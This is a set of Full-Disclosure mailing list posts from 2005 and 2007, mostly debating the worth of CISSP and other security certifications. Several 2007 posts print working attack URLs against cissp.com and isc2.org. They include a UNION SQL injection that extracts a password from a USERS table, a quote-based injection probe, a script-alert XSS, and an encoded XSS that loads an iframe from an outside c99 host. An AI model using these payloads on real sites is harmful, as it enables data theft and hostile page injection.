Re: [Full-disclosure] CISSP, Final Round
On 8/11/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > Nobody paid them. It's not an official CISSP site. That one would be > > found at www.isc2.org > > Ahh, a simple mistake. This is the *real* certified internet security > professionals page. [...] > > > what is this !? :( What do you think it is? it's a public directory of CISSP certified who have asked to be publicly visible in the directory. > i hope all these cissp's didn't pay for their materials online :( [...] These CISSP have explicitly chosen to be visible. That's me: http://tinyurl.com/38dakw (look mama, I'm an hacker. I can use tinyurl!!!) On 8/14/07, Ray P <[EMAIL PROTECTED]> wrote: > You really have too much free time on your hands. :-) > And it's sadly lost... Regards. -- Marco Ermini [EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research http://www.markoer.org/ - https://www.linkedin.com/in/marcoermini "Jesus saves... but Buddha makes incremental back-ups!" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP, Final Round
You really have too much free time on your hands. :-) >From: [EMAIL PROTECTED] >To: full-disclosure@lists.grok.org.uk >Subject: [Full-disclosure] CISSP, Final Round >Date: Sat, 11 Aug 2007 01:14:14 -0400 > > > Nobody paid them. It's not an official CISSP site. That one would be > > found at www.isc2.org > >Ahh, a simple mistake. This is the *real* certified internet security >professionals page. > >https://www.isc2.org/cgi-bin/directory.cgi?Command=Search&Country=&State=&City=&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E > > >what is this !? :( >i hope all these cissp's didn't pay for their materials online :( >bzpz. > >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _ Puzzles, trivia teasers, word scrambles and more. Play for your chance to win! http://club.live.com/home.aspx?icid=CLUB_hotmailtextlink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CISSP, Final Round
> Nobody paid them. It's not an official CISSP site. That one would be > found at www.isc2.org Ahh, a simple mistake. This is the *real* certified internet security professionals page. https://www.isc2.org/cgi-bin/directory.cgi?Command=Search&Country=&State=&City=&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E what is this !? :( i hope all these cissp's didn't pay for their materials online :( bzpz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP, round two
Nobody paid them. It's not an official CISSP site. That one would be found at www.isc2.org http://www.cissp.com/about/about_us.asp - "CISSP.com and all related web sites are an effort by Mr. Afifi to help promote Information Security awareness, the CISSP Certification, share knowledge and communication amongst certified information system security professionals and to help information security professionals who are seeking to become CISSPs." I'm certain he is happy to have promoted your level of awareness. :-) From: Tonu Samuel <[EMAIL PROTECTED]> To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] CISSP, round two Date: Mon, 06 Aug 2007 20:00:28 +0300 Long time ago someone posted here SQL injection on CISSP page. No changes. I post slightly "modified" version to bug them again http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union% 20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where% 20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201% 20password%20from% 20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome Who paid $$$ to them to get "certificate"? hehe :P Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _ A new home for Mom, no cleanup required. All starts here. http://www.reallivemoms.com?ocid=TXT_TAGHM&loc=us ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CISSP, round two
Long time ago someone posted here SQL injection on CISSP page. No changes. I post slightly "modified" version to bug them again http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union% 20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where% 20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201% 20password%20from% 20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome Who paid $$$ to them to get "certificate"? hehe :P Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CISSP class #2: SQL injection
http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10'3281&Section=Welcome ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP
Daniel Marsh schrieb: > On 6/19/07, Bozo Bad <[EMAIL PROTECTED]> wrote: >> >> http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, >> I'm a CISSP!%22)%3C/script%3E > > That's a beautiful thing. > Irony at its best. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP
On 6/19/07, Bozo Bad <[EMAIL PROTECTED]> wrote: http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, I'm a CISSP!%22)%3C/script%3E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ That's a beautiful thing. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CISSP
http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, I'm a CISSP!%22)%3C/script%3E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
reminds me of the time when my father had all his letters placed after his name on a letter from the royal college of psychiatrists. He is a very bright man and had just been made one of the very few general practitioners (family practitioners) to be made a fellow of the above college, mainly due to being published in peer reviewed journals every year since 1971 and running a psychosexual clinic for many years. Anywho, the nice postman had added the letters C.R.A.P. after the long list. He laughed, saying that some of the letters had been gleaned during a time when "they were giving them away if you collected enough crisp (chip) packets" my point and his is that it doesn't really matter what goes after your name as it doesn't mean that much. I myself have MB Ch.B - bachelor of medicine and surgery and CCNA but neither of these qualifies me to do anything, my recent experience is much more relevant so you will find neither of them (or any others that i might accrue because i like the feeling i get taking exams) in my sig. I would rather that people type my name into google and find something interesting there -don't bother, you won't On Mar 29, 2005 10:49 PM, J. Oquendo <[EMAIL PROTECTED]> wrote: > > On Tue, 29 Mar 2005, R Mondesir wrote: > > > The C.P.A exam for accountants is a better comparison to the CISSP > > than the Bar exam is for lawyers if we are going to compare industry > > benchmarks. Eitherway, an internationally accepted stantard seems > > inevitable. > > Funny thing is, outside of the USA, I barely see people abroad toss in > fifty different little signatures when they send out mail. > > Joe Blow > SCSA, CISSP, CCIE, CCDA, MCSE, FOOL, PWND, OVRKL > 55 Main Street > London Bridge > > With the exception of the Cisco certs, I can't recall seeing someone "tag" > their CISSP status coming from somewhere outside of the United States. Not > to say it is not important, but sigs (and this is all they mean to me... > signatures) are becoming overrated and bloated. Its like "Yea well I just > obtained my Symantec Uber Certified Klassification! Now I can add a SUCK > to my sig!" Give me a break. > > I should for kicks dig through some of the mailing lists I'm on and point > fingers at CCDA's, MCSE's, CISSP's, and other little signature devils who > ask questions a 16 year old can answer. There are those who take tests, > and there are those who don't. > > I'm sure many on this list know someone who is supposed to know but is > actually a clueless gimp. > > > > I wholeheartedly agree that there needs to be an industry benchmark, > > > something that says you cannot operate in this field unless you have > > > passed > > > x. I'm thinking along the lines of something similar to the Bar exam that > > Industry benchmark? Sure there should be some overall knowledge of just > about everything but how do you define the unknown which is what most > computer security is at its core. Well I guess I'm looking at it from a > Greyhat perspective. How do you expect someone to learn vulnerabilities > that pop up. It takes a little more than reading and memorizing some book. > Bottom line in my opinion. > > > > lawyers have to take, or perhaps a license like what doctors are required > > > to > > > obtain before being able to practice. I fear its going to take something > > > of > > > that level to truly separate the chaff from the wheat. Anything less and > > > you > > > only end up with braindumps and bootcampers throwing resume after resume > > > at > > > you. > > It will not separate any chaff from the wheat. How many people just dive > into books and pass exams? With the CISSP, one is supposed to have an > alloted amount of time in the field. Sure lets debunk this moronic notion > of them validating this... Joe Blow worked for Foo Financial for 10 years. > 9 of those years where in the mailroom. His brother in law works in the > compsec department and convinced his boss to `give him a chance`. Joe Blow > with one year experience studies for that one year. Applies to take the > test with (get this) 10 years (oh my he has some experience (do he not!) > under his wing. Joe Blow gets his sig and becomes a sig nazi. Whoopdeedoo. > So much for standards. > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > J. Oquendo > GPG Key ID 0x0D99C05C > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C > > sil @ infiltrated . net http://www.infiltrated.net > > "How a man plays the game shows something of his > character - how he loses shows all" - Mr. Luckey > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
On Tue, 29 Mar 2005, R Mondesir wrote: > The C.P.A exam for accountants is a better comparison to the CISSP > than the Bar exam is for lawyers if we are going to compare industry > benchmarks. Eitherway, an internationally accepted stantard seems > inevitable. Funny thing is, outside of the USA, I barely see people abroad toss in fifty different little signatures when they send out mail. Joe Blow SCSA, CISSP, CCIE, CCDA, MCSE, FOOL, PWND, OVRKL 55 Main Street London Bridge With the exception of the Cisco certs, I can't recall seeing someone "tag" their CISSP status coming from somewhere outside of the United States. Not to say it is not important, but sigs (and this is all they mean to me... signatures) are becoming overrated and bloated. Its like "Yea well I just obtained my Symantec Uber Certified Klassification! Now I can add a SUCK to my sig!" Give me a break. I should for kicks dig through some of the mailing lists I'm on and point fingers at CCDA's, MCSE's, CISSP's, and other little signature devils who ask questions a 16 year old can answer. There are those who take tests, and there are those who don't. I'm sure many on this list know someone who is supposed to know but is actually a clueless gimp. > > I wholeheartedly agree that there needs to be an industry benchmark, > > something that says you cannot operate in this field unless you have passed > > x. I'm thinking along the lines of something similar to the Bar exam that Industry benchmark? Sure there should be some overall knowledge of just about everything but how do you define the unknown which is what most computer security is at its core. Well I guess I'm looking at it from a Greyhat perspective. How do you expect someone to learn vulnerabilities that pop up. It takes a little more than reading and memorizing some book. Bottom line in my opinion. > > lawyers have to take, or perhaps a license like what doctors are required to > > obtain before being able to practice. I fear its going to take something of > > that level to truly separate the chaff from the wheat. Anything less and you > > only end up with braindumps and bootcampers throwing resume after resume at > > you. It will not separate any chaff from the wheat. How many people just dive into books and pass exams? With the CISSP, one is supposed to have an alloted amount of time in the field. Sure lets debunk this moronic notion of them validating this... Joe Blow worked for Foo Financial for 10 years. 9 of those years where in the mailroom. His brother in law works in the compsec department and convinced his boss to `give him a chance`. Joe Blow with one year experience studies for that one year. Applies to take the test with (get this) 10 years (oh my he has some experience (do he not!) under his wing. Joe Blow gets his sig and becomes a sig nazi. Whoopdeedoo. So much for standards. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo GPG Key ID 0x0D99C05C http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C sil @ infiltrated . net http://www.infiltrated.net "How a man plays the game shows something of his character - how he loses shows all" - Mr. Luckey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
Given that many of the certificates are now "boot camp" type, this should put a different light on those colleges that are pumping out Bachelors of Information Security, Masters and Doctors of Information security as well. Wondering if the acedemic credentials will become important in the longer run. But without Big Business, and ISSA, OSCOMM, ISC2, SANs and others, an international standard is going to be hard to hammer out. What does a security person really need to know in what role, analyst, engineer, code walker, network engineer, systems security, firewall/ids admin? Previous in this thread, its going to take money, and while the money motivation is there, it will be really hard to get anyone to take anything seriously past the "bottom line". There are going to have to be major sources of aggrivation, and maybe the feds will step in with minimum qualifications much like GSA or NSA have done? Who knows, its going to be a rough couple of years for IS. Going to be a lifetimes work for whom ever takes this one up. r/ Dan Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time. From: R Mondesir <[EMAIL PROTECTED]> Reply-To: R Mondesir <[EMAIL PROTECTED]> To: SecurityLSI <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: Re: RES: [Full-disclosure] CISSP Test Date: Tue, 29 Mar 2005 16:36:13 -0500 The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Eitherway, an internationally accepted stantard seems inevitable. -Rafiyq On Sat, 26 Mar 2005 01:26:36 -0500, SecurityLSI <[EMAIL PROTECTED]> wrote: > I wholeheartedly agree that there needs to be an industry benchmark, > something that says you cannot operate in this field unless you have passed > x. I'm thinking along the lines of something similar to the Bar exam that > lawyers have to take, or perhaps a license like what doctors are required to > obtain before being able to practice. I fear its going to take something of > that level to truly separate the chaff from the wheat. Anything less and you > only end up with braindumps and bootcampers throwing resume after resume at > you. > > The added bonus of having an industry benchmark that bars entry into the > field tracks to something a mentor once told me: people that belong to > unions drive Chevys and Fords. Those that belong to associations drive BMWs > and Mercedes. > > --Joe > > - Original Message - > From: "Vladamir" <[EMAIL PROTECTED]> > To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]> > Cc: <> > Sent: Wednesday, March 23, 2005 1:52 PM > Subject: Re: RES: [Full-disclosure] CISSP Test > > > CCIE is where it's at. > > > > I love writing practice tests, but I'm only 20, so what do I know > > > > Jose Ribeiro Junior wrote: > > > Hi Friends, > > > > > > What you think about CCIE certification model, practice and write tests > ? > > > > > > I think that is a good model to Security Certifications. > > > > > > But, can you create a practice tests not using especific vendors ? > > > > > > -Mensagem original- > > > De: [EMAIL PROTECTED] > > > [mailto:[EMAIL PROTECTED] nome de Vladamir > > > Enviada em: quarta-feira, 23 de março de 2005 14:23 > > > Para: DAN MORRILL > > > Cc: full-disclosure@lists.grok.org.uk > > > Assunto: Re: [Full-disclosure] CISSP Test > > > > > > > > > Very good points, so.. who wants to start writing to the mentioned > > > organizations about this? > > > > > > DAN MORRILL wrote: > > > > > >>I think in reading the multiple threads on this issue, there there are a > > >>number of perspectives on the value of the CISSP. > > >> > > >>What was most interesting was the CEO's perspective. Since the CISSP is > > >>a boot camp, and the SANS is bootcampable in the longer run with the > > >>removal of the practicle. The real question is working towards a > > >>certificate that demonstrates ability to work in the security arena, one > > >>that is really hard to get, and one that really tests the ability to do > > >>the work. > > >> > > >>While CISSP and SANS are great to have as a resume filter, it does not > > >>imply that anyone with either certificate to their name can actually do > > >>the work. What I am seeing is that many people are going for t
Re: RES: [Full-disclosure] CISSP Test
The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Eitherway, an internationally accepted stantard seems inevitable. -Rafiyq On Sat, 26 Mar 2005 01:26:36 -0500, SecurityLSI <[EMAIL PROTECTED]> wrote: > I wholeheartedly agree that there needs to be an industry benchmark, > something that says you cannot operate in this field unless you have passed > x. I'm thinking along the lines of something similar to the Bar exam that > lawyers have to take, or perhaps a license like what doctors are required to > obtain before being able to practice. I fear its going to take something of > that level to truly separate the chaff from the wheat. Anything less and you > only end up with braindumps and bootcampers throwing resume after resume at > you. > > The added bonus of having an industry benchmark that bars entry into the > field tracks to something a mentor once told me: people that belong to > unions drive Chevys and Fords. Those that belong to associations drive BMWs > and Mercedes. > > --Joe > > - Original Message - > From: "Vladamir" <[EMAIL PROTECTED]> > To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]> > Cc: <> > Sent: Wednesday, March 23, 2005 1:52 PM > Subject: Re: RES: [Full-disclosure] CISSP Test > > > CCIE is where it's at. > > > > I love writing practice tests, but I'm only 20, so what do I know > > > > Jose Ribeiro Junior wrote: > > > Hi Friends, > > > > > > What you think about CCIE certification model, practice and write tests > ? > > > > > > I think that is a good model to Security Certifications. > > > > > > But, can you create a practice tests not using especific vendors ? > > > > > > -Mensagem original----- > > > De: [EMAIL PROTECTED] > > > [mailto:[EMAIL PROTECTED] nome de Vladamir > > > Enviada em: quarta-feira, 23 de março de 2005 14:23 > > > Para: DAN MORRILL > > > Cc: full-disclosure@lists.grok.org.uk > > > Assunto: Re: [Full-disclosure] CISSP Test > > > > > > > > > Very good points, so.. who wants to start writing to the mentioned > > > organizations about this? > > > > > > DAN MORRILL wrote: > > > > > >>I think in reading the multiple threads on this issue, there there are a > > >>number of perspectives on the value of the CISSP. > > >> > > >>What was most interesting was the CEO's perspective. Since the CISSP is > > >>a boot camp, and the SANS is bootcampable in the longer run with the > > >>removal of the practicle. The real question is working towards a > > >>certificate that demonstrates ability to work in the security arena, one > > >>that is really hard to get, and one that really tests the ability to do > > >>the work. > > >> > > >>While CISSP and SANS are great to have as a resume filter, it does not > > >>imply that anyone with either certificate to their name can actually do > > >>the work. What I am seeing is that many people are going for these, and > > >>have them, but had them a result from an IDS system, or ask them to do a > > >>security design for either a network or a chunk of code, the ability to > > >>actually perform the task is not there, even though they have the > > >>certificate. > > >> > > >>Personally, I believe the community needs something, certificate, > > >>degree, internship, what ever, that actually means you can perform > > >>competently in the security arena. That there is a skill set there that > > >>the entire community agree's upon is the minimum recommended skill set > > >>to work in this field. If we had something like that, then any school > > >>that is pumping out Bachelors of Information Security folks would have a > > >>standard. Anyone building a bootcamp or certificate program would have > > >>an agreed upon community standard to work with. > > >> > > >>ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with > > >>the community, develop the minimum qualifications to work in the field, > > >>and actually accomplish something once they have been certified or > > >>degreed. NSA has been hugely successful in developing security schools > > >>through James Madison, Boise, et al. But they have to agree to and teach > > >>to the minimum standard that NSA has put together t
Re: [OT] [Full-disclosure] CISSP Test
- Original Message - From: SecurityLSI <[EMAIL PROTECTED]> To: "Anders Langworthy" <[EMAIL PROTECTED]>; Sent: Saturday, March 26, 2005 12:16 PM Subject: Re: [OT] [Full-disclosure] CISSP Test > When it comes to InfoSec, its not hard to imagine the government madating > a form of licensing for all security professionals that deal with regulated > privacy matters (i.e. HIPPA et al). In fact, I think this would be a good > thing as it would inevitably be extended to other realms of IT, although it > would probably occur in an informal fashion. > > As more and more privacy regulation becomes the norm, I fully encourage > the government to require some form of high-level certification that must be > an across-the-board mandate (i.e. licensing). Its the only way to ensure > competent professionals are the ones filling security positions. That's not > to say there still won't be some duds, but at least you won't have the flood > of bootcampers, braindumps, and paper certs who are only out to make a fast > buck. After all, the security of our citizens' privacy, as well as the > integrity of our nation's critical infrastructures are at stake. > > --Joe > > - Original Message - > From: "Anders Langworthy" <[EMAIL PROTECTED]> > To: > Sent: Saturday, March 26, 2005 1:59 AM > Subject: Re: [OT] [Full-disclosure] CISSP Test > > > > SecurityLSI wrote: > > > I wholeheartedly agree that there needs to be an industry benchmark, > > > something that says you cannot operate in this field unless you have > passed > > > x. I'm thinking along the lines of something similar to the Bar exam > that > > > lawyers have to take, or perhaps a license like what doctors are > required to > > > obtain before being able to practice. I fear its going to take something > of > > > that level to truly separate the chaff from the wheat. Anything less and > you > > > only end up with braindumps and bootcampers throwing resume after resume > at > > > you. > > > > > > > There is an important distinction between something like the Bar, and > > medical licensure. The InfoSec equivalent of the legal Bar would be > > impossible to implement, because unlike a courtroom, a network is not > > under regulated control. If you wish to practice law, you must do it in > > a government-controlled courtroom*, and that government says that you > > must pass the Bar before doing so. > > > > My network, on the other hand--like my body--belongs to me. Nobody has > > the right to tell me who I can and cannot hire to work on them. In the > > same way, I could pay somebody off the street to perform surgery on me > > if I wished. I wouldn't recommend it, and they wouldn't be a licensed > > doctor, but nobody can stop me. > > > > So what difference does it make if we add another benchmark/"cert"? We > > already have plenty. Even if it were possible, would we really want to > > grant absolute power to something like the medical AMA? > > > > * Judge Judy doesn't count. > > > > -- > > Anders > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [OT] [Full-disclosure] CISSP Test
SecurityLSI wrote: I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear its going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you. There is an important distinction between something like the Bar, and medical licensure. The InfoSec equivalent of the legal Bar would be impossible to implement, because unlike a courtroom, a network is not under regulated control. If you wish to practice law, you must do it in a government-controlled courtroom*, and that government says that you must pass the Bar before doing so. My network, on the other hand--like my body--belongs to me. Nobody has the right to tell me who I can and cannot hire to work on them. In the same way, I could pay somebody off the street to perform surgery on me if I wished. I wouldn't recommend it, and they wouldn't be a licensed doctor, but nobody can stop me. So what difference does it make if we add another benchmark/"cert"? We already have plenty. Even if it were possible, would we really want to grant absolute power to something like the medical AMA? * Judge Judy doesn't count. -- Anders ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear its going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you. The added bonus of having an industry benchmark that bars entry into the field tracks to something a mentor once told me: people that belong to unions drive Chevys and Fords. Those that belong to associations drive BMWs and Mercedes. --Joe - Original Message - From: "Vladamir" <[EMAIL PROTECTED]> To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]> Cc: <> Sent: Wednesday, March 23, 2005 1:52 PM Subject: Re: RES: [Full-disclosure] CISSP Test > CCIE is where it's at. > > I love writing practice tests, but I'm only 20, so what do I know > > Jose Ribeiro Junior wrote: > > Hi Friends, > > > > What you think about CCIE certification model, practice and write tests ? > > > > I think that is a good model to Security Certifications. > > > > But, can you create a practice tests not using especific vendors ? > > > > -Mensagem original- > > De: [EMAIL PROTECTED] > > [mailto:[EMAIL PROTECTED] nome de Vladamir > > Enviada em: quarta-feira, 23 de marÃo de 2005 14:23 > > Para: DAN MORRILL > > Cc: full-disclosure@lists.grok.org.uk > > Assunto: Re: [Full-disclosure] CISSP Test > > > > > > Very good points, so.. who wants to start writing to the mentioned > > organizations about this? > > > > DAN MORRILL wrote: > > > >>I think in reading the multiple threads on this issue, there there are a > >>number of perspectives on the value of the CISSP. > >> > >>What was most interesting was the CEO's perspective. Since the CISSP is > >>a boot camp, and the SANS is bootcampable in the longer run with the > >>removal of the practicle. The real question is working towards a > >>certificate that demonstrates ability to work in the security arena, one > >>that is really hard to get, and one that really tests the ability to do > >>the work. > >> > >>While CISSP and SANS are great to have as a resume filter, it does not > >>imply that anyone with either certificate to their name can actually do > >>the work. What I am seeing is that many people are going for these, and > >>have them, but had them a result from an IDS system, or ask them to do a > >>security design for either a network or a chunk of code, the ability to > >>actually perform the task is not there, even though they have the > >>certificate. > >> > >>Personally, I believe the community needs something, certificate, > >>degree, internship, what ever, that actually means you can perform > >>competently in the security arena. That there is a skill set there that > >>the entire community agree's upon is the minimum recommended skill set > >>to work in this field. If we had something like that, then any school > >>that is pumping out Bachelors of Information Security folks would have a > >>standard. Anyone building a bootcamp or certificate program would have > >>an agreed upon community standard to work with. > >> > >>ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with > >>the community, develop the minimum qualifications to work in the field, > >>and actually accomplish something once they have been certified or > >>degreed. NSA has been hugely successful in developing security schools > >>through James Madison, Boise, et al. But they have to agree to and teach > >>to the minimum standard that NSA has put together to meet the needs that > >>NSA has identified. > >> > >>I think until we as a community agree upon a minimum standard, apply it > >>consistantly across the board much like doctors, lawyers, social > >>workers, and other degreed or licensed professionals, we will continue > >>to have this debate until the house burns down. As security > >>professionals, as security folks, we have the same ability to either do > >>good, or do harm as any other profession does. We need to understand > >>this, and begin working towards skill sets either certificate or degree > >>that actually mean something useful at the end of the day. > >&g
RE: [Full-disclosure] CISSP Test
>I think that is a good model to Security Certifications. >But, can you create a practice tests not using especific vendors ? For 3 years ISECOM has been providing practical, vendor-neutral, tool-neutral, professional certification exams that test skill and applied knowledge fairly and accurately. ISECOM is a non-profit registered in the US and in Spain and our exam fees go into the info-security and open methodology projects we provide for free (and Free). So yes, it is possible. It's time extensive, costly to maintain, and complex to provide which is why not everyone does it. But ISECOM does and will continue to do so. Sincerely, -pete. -- Pete Herzog - Managing Director - [EMAIL PROTECTED] ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.isestorm.org --- ISECOM is the OSSTMM Professional Security Tester (OPST), OSSTMM Professional Security Analyst (OPSA), and Hacker Highschool Teacher certification authority. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
CCIE is where it's at. I love writing practice tests, but I'm only 20, so what do I know Jose Ribeiro Junior wrote: Hi Friends, What you think about CCIE certification model, practice and write tests ? I think that is a good model to Security Certifications. But, can you create a practice tests not using especific vendors ? -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] nome de Vladamir Enviada em: quarta-feira, 23 de marÃo de 2005 14:23 Para: DAN MORRILL Cc: full-disclosure@lists.grok.org.uk Assunto: Re: [Full-disclosure] CISSP Test Very good points, so.. who wants to start writing to the mentioned organizations about this? DAN MORRILL wrote: I think in reading the multiple threads on this issue, there there are a number of perspectives on the value of the CISSP. What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practicle. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work. While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate. Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agree's upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with. ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified. I think until we as a community agree upon a minimum standard, apply it consistantly across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day. My thoughts, flames invited. r/ Dan Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time. From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500 Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolve SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even thou you see the name GIAC and SANS being used everywhere, they are all trademark (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public a
RES: [Full-disclosure] CISSP Test
